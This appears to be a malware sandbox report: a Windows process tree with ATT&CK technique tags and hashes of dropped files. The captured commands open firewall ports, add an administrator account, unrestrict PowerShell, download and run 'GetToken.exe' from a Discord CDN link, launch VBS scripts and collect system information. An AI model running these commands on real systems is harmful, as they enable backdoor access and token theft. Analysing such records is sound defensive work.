netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:1424

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:2076

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:2548

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K FuckPorts.cmd
2⤵
PID:948

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Set-ExecutionPolicy Unrestricted"
3⤵
PID:1620

C:\Windows\system32\net.exe
net localgroup administrators session /ADD
3⤵
PID:2360

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:2480

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:2888

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:2136

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:2452

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:2680

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:2076

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:2352

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:2412

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:1424

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:2976

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:2372

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:2604

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:2720

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:1756

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:2336

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:2640

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:3060

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:2372

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:976

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:1424

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:2480

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:2708

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:1572

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:2800

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:2188

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:632

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:2672

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:2424

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:844

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:2176

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:2440

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:1848

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:3056

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:1808

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:3048

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:2064

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:2412

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:2732

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:2140

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:1532

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:2296

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K FuckPorts.cmd
2⤵
PID:1072

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Set-ExecutionPolicy Unrestricted"
3⤵
PID:1488

C:\Windows\system32\net.exe
net localgroup administrators session /ADD
3⤵
PID:2552

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:2636

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:2936

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:1356

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:2592

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:2872

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:2232

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:2448

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:1384

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:2896

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:1932

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:2476

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:868

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:3020

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:2200

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:2692

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:1176

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:2612

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:1928

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:2752

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:2712

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:2076

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:2616

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:2876

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:956

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:2536

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:2476

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:2864

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:2184

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:2548

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:1600

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:2280

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:2196

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:2836

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:3064

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:2716

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:1820

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:2772

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:1760

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:2900

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:2720

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K FuckPorts.cmd
2⤵
PID:1788

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Set-ExecutionPolicy Unrestricted"
3⤵
PID:428

C:\Windows\system32\net.exe
net localgroup administrators session /ADD
3⤵
PID:2616

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup administrators session /ADD
4⤵
PID:2628

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:2684

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:3016

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:2184

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:2420

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:2984

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:3056

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:2288

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:2588

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:1576

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:2796

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:2524

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:2552

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:2532

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:3016

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:2328

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:2604

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:1984

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:2572

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:2704

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:1848

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:3068

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:2356

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:2564

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:2196

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:1176

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:2096

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:1280

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:2596

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:2192

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:2224

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:2700

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:2788

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:2356

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:2656

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:2240

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:2444

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:2652

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:1600

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:2740

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:2736

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\loveletter.vbs"
2⤵
PID:1872

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/971160786015772724/971191444410875914/GetToken.exe', 'GetToken.exe')"
2⤵
PID:2208

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\mail.vbs"
2⤵
PID:2192

C:\Users\Admin\GetToken.exe
GetToken.exe
2⤵
PID:1264

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table >C:\Users\Admin\apps.txt"
2⤵
PID:1384

C:\Windows\system32\ipconfig.exe
ipconfig
2⤵
- Gathers network information
PID:2692

C:\Windows\system32\getmac.exe
getmac
2⤵
PID:2856

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get caption, name, deviceid, numberofcores, maxclockspeed, status
2⤵
PID:2352

C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
2⤵
PID:692

C:\Windows\System32\Wbem\WMIC.exe
wmic partition get name,size,type
2⤵
PID:2184

C:\Windows\system32\systeminfo.exe
systeminfo
2⤵
- Gathers system information
PID:2232

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup administrators session /ADD
1⤵
PID:2388

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup administrators session /ADD
1⤵
PID:2588

C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE" -Embedding
1⤵
PID:2724

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Command-Line Interface

T1059

Persistence

Account Manipulation

T1098

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\HideyHidey.vbs
Filesize
130B

MD5
591cc6cb1292cf00d1f24e0832e82c7f

SHA1
27b190559fd22ee46085db02ce8725a4c6720e64

SHA256
6cff6ccccc854997bb89a46157554a0265afc1f3d3f5d0522f6a1323cc559862

SHA512
0b89a67ca2c3ca0563231b805b6db921a3515f20c86dfb4cd28b195ea0de6f05f46e1fccc9041b8f96013e15d139e104454d064fd4529fb44151ee024f8d18b7

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
9f919c5d9db2c1e8ddb8e8a5daa185c3

SHA1
b8f8235942a14e955d393ad874dcdeb7cb741eca

SHA256
d999a5b1d898967acd4ff79003bbef8b1eeff815e572ddc6e8f1e8315bbdd93c

SHA512
d72def65bdf7535d47d6b2362e5e281c3b6f1292f29eee29b57bbe99e03689cc1f29645662bed4d66769565d7ec15e9ff5e595153329ec7892a83e57d31d2313

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
9f919c5d9db2c1e8ddb8e8a5daa185c3

SHA1
b8f8235942a14e955d393ad874dcdeb7cb741eca

SHA256
d999a5b1d898967acd4ff79003bbef8b1eeff815e572ddc6e8f1e8315bbdd93c

SHA512
d72def65bdf7535d47d6b2362e5e281c3b6f1292f29eee29b57bbe99e03689cc1f29645662bed4d66769565d7ec15e9ff5e595153329ec7892a83e57d31d2313

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
9f919c5d9db2c1e8ddb8e8a5daa185c3

SHA1
b8f8235942a14e955d393ad874dcdeb7cb741eca

SHA256
d999a5b1d898967acd4ff79003bbef8b1eeff815e572ddc6e8f1e8315bbdd93c

SHA512
d72def65bdf7535d47d6b2362e5e281c3b6f1292f29eee29b57bbe99e03689cc1f29645662bed4d66769565d7ec15e9ff5e595153329ec7892a83e57d31d2313

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
1affa511bfe9ee18c52dd333a6edbbd1

SHA1
b9aff7ea713eb42c7eb94b1606acfd79ef684fe7

SHA256
55886278efb18703ed63f28ae5011aa6051da3d0a59713ed3e2df30036c72c5f

SHA512
ad38d449c74b6c018e5709dd5af6f58a50e5914bc6ae73e0c5fc79724d47e58a1659692b5fe27e59b3e235f151f12199f1a175c6cffcd4b6d727049f88325bf7

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
1affa511bfe9ee18c52dd333a6edbbd1

SHA1
b9aff7ea713eb42c7eb94b1606acfd79ef684fe7

SHA256
55886278efb18703ed63f28ae5011aa6051da3d0a59713ed3e2df30036c72c5f

SHA512
ad38d449c74b6c018e5709dd5af6f58a50e5914bc6ae73e0c5fc79724d47e58a1659692b5fe27e59b3e235f151f12199f1a175c6cffcd4b6d727049f88325bf7

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
9f919c5d9db2c1e8ddb8e8a5daa185c3

SHA1
b8f8235942a14e955d393ad874dcdeb7cb741eca

SHA256
d999a5b1d898967acd4ff79003bbef8b1eeff815e572ddc6e8f1e8315bbdd93c

SHA512
d72def65bdf7535d47d6b2362e5e281c3b6f1292f29eee29b57bbe99e03689cc1f29645662bed4d66769565d7ec15e9ff5e595153329ec7892a83e57d31d2313

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
9f919c5d9db2c1e8ddb8e8a5daa185c3

SHA1
b8f8235942a14e955d393ad874dcdeb7cb741eca

SHA256
d999a5b1d898967acd4ff79003bbef8b1eeff815e572ddc6e8f1e8315bbdd93c

SHA512
d72def65bdf7535d47d6b2362e5e281c3b6f1292f29eee29b57bbe99e03689cc1f29645662bed4d66769565d7ec15e9ff5e595153329ec7892a83e57d31d2313

Download Submit
C:\Users\Admin\Documents\NoKeyB.exe
Filesize
1.2MB

MD5
6bc9c0340385a1ff2a8dd1b841415211

SHA1
f7b4088b012271ed06c24392bbcb5f9eb75219c2

SHA256
9df4d035d4d53d22fb29b5288336a05041e85fd448bb20ffe026b61bea52cf13

SHA512
9bebb00be1fef4e9ac739d4a0ef64a3d8e789cd4d87d9f98fc9813c2b15b84549319275fc6f294a50436fd6843df868b202e40b59ba0081a7a6eda797828fdea

Download Submit
C:\Users\Admin\Documents\NoKeyB.exe
Filesize
1.2MB

MD5
6bc9c0340385a1ff2a8dd1b841415211

SHA1
f7b4088b012271ed06c24392bbcb5f9eb75219c2

SHA256
9df4d035d4d53d22fb29b5288336a05041e85fd448bb20ffe026b61bea52cf13

SHA512
9bebb00be1fef4e9ac739d4a0ef64a3d8e789cd4d87d9f98fc9813c2b15b84549319275fc6f294a50436fd6843df868b202e40b59ba0081a7a6eda797828fdea

Download Submit
C:\Users\Admin\Documents\black.bat
Filesize
71B

MD5
3544e4b7ac1418d34061648a9f3e3dc6

SHA1
30e88f4aa1cc6c936c9c274f9f4f53b491a4d8ce

SHA256
db24f2b49b88e4cf7c3569a067f3e6e325d54a3be2368262d37a6a34f4f8aae8

SHA512
5d3048b421b4900efdce377d61f8965beb4bc02db27875c03eb378cd9996de9a01b63e54e99b4f94e4cf14e1b60d873d715ccea38fd0bdc1200ad3a2f268e126

Download Submit
C:\Users\Admin\Downloads\2b2crypt.cmd
Filesize
133B

MD5
88c499eaa6d56b81dd768537c1ecb0d1

SHA1
4c46e09600275b2f12606988f4b094bc4eeb963c

SHA256
0350882ce7c5932dac22fb5bca6b68d003f9fbdccbef34705dfc46677dc852a1

SHA512
9de0d8199fd0e515f1f2bd39b82724d517dd60c69fb82e274fdb664d6997c93ce60b68efb4d0c4b947ef72da2748bf971b4a67172aa2ac613f15750e279d76f0

Download Submit
C:\Users\Admin\Downloads\2b2crypt.m.cmd
Filesize
139B

MD5
8176e163bf0ad76fd736cf7b30bcb70b

SHA1
61729d18f62b6dcb6072899d9920d25b79bfeaa1

SHA256
737c657b3c9930c93d06eef6f36241b4ab775c3aa577652c3718701bf745c05b

SHA512
b9ab5b3a45cc8a5a6b7d7686839769eeff2b052f0d061e2234e23d48e8d30f8e4bcb0ea27032a1c75fdff90f516bd7a25a09a76502daa2bfe2abb87f2ea46ff6

Download Submit
C:\Users\Admin\FuckPorts.cmd
Filesize
357B

MD5
d7cce0d652d1e1dbfffc2434835913a8

SHA1
009beed096a17fec661ba21e404a19a33bf3fdbd

SHA256
86590354b1862fbd67e6b51acafa972a1c6c3888780d98d537fbbe08814762dd

SHA512
862b5764efbdb24952303c124a071dcabf3b6786d97efd999a6c5fcc552d4fbb41e6d39ea9563adfbd785cba1a3c50f87484dbba67485c2bb793880555cfc9c1

Download Submit
C:\Users\Admin\GetToken.exe
Filesize
8KB

MD5
2ed86e80ea9b4b95b3e52ed77ea6c401

SHA1
5032e67b7c84362374b7d52507ab83ae03d7ebff

SHA256
6ad08fe301caae18941487412e96ceb0b561de4482da25ea4bb8eeb6c1a40983

SHA512
64fa72aea094f6aa03d9f6dcee3f72ce156a5a7802c39c59af5fc637e72303d46740f0c022fbd4c9f1ec62300ee33cc0af2ac0622729ae67717f580e007e6e71

Download Submit
C:\Users\Admin\GetToken.exe
Filesize
8KB

MD5
2ed86e80ea9b4b95b3e52ed77ea6c401

SHA1
5032e67b7c84362374b7d52507ab83ae03d7ebff

SHA256
6ad08fe301caae18941487412e96ceb0b561de4482da25ea4bb8eeb6c1a40983

SHA512
64fa72aea094f6aa03d9f6dcee3f72ce156a5a7802c39c59af5fc637e72303d46740f0c022fbd4c9f1ec62300ee33cc0af2ac0622729ae67717f580e007e6e71

Download Submit
C:\Users\Admin\loveletter.vbs
Filesize
495B

MD5
900ead69492d80e48738921eca28b14f

SHA1
